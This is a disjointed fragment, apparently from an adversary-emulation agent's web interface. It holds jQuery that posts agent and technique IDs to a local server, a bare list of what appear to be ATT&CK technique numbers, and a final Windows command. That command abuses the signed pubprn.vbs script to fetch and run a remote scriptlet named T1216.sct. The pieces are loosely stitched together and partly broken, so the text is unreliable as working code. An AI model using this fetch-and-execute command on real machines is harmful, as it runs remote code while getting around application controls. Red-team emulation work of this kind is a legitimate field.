
                var tech_id = $(this).val();
                var agent_id = $("#agent_id").val();
                console.log(tech_id);
                console.log(agent_id);

                $.post("http://localhost:8000/customize_technique",{ 'agent_id': agent_id , 'tech_id': tech_id });

    $(document).load(data);
                
                
                // window.location.assign("http://localhost:8000/customize_technique_post");


            });


            1086
1216
1218
1179
1086

1117
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://localhost:8000/downloads/T1216.sct"